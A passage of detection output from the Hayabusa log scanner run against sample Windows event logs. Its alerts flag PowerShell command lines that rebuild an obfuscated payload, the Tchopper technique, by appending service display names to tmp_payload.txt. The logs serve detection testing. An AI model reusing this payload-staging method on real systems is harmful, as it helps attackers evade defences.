payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:08.513 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:09.965 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:09.965 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:09.965 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:11.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:11.418 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:11.418 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:12.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:12.925 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:12.925 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:14.417 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:14.417 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:14.417 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:15.867 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:15.867 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:15.867 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:17.309 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:17.324 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:17.324 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:18.812 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:18.812 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:18.812 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:20.265 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:20.281 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:20.281 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:21.715 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:21.715 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:21.715 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:23.168 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:23.168 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:23.168 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:24.599 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:24.615 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:24.615 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:26.056 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:26.072 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:26.072 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:27.510 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:27.525 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:27.525 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:28.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:28.961 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:28.961 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:30.412 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:30.412 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:30.412 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:31.851 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:31.867 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:31.867 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:33.302 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:33.318 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:33.318 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:34.772 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:34.772 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
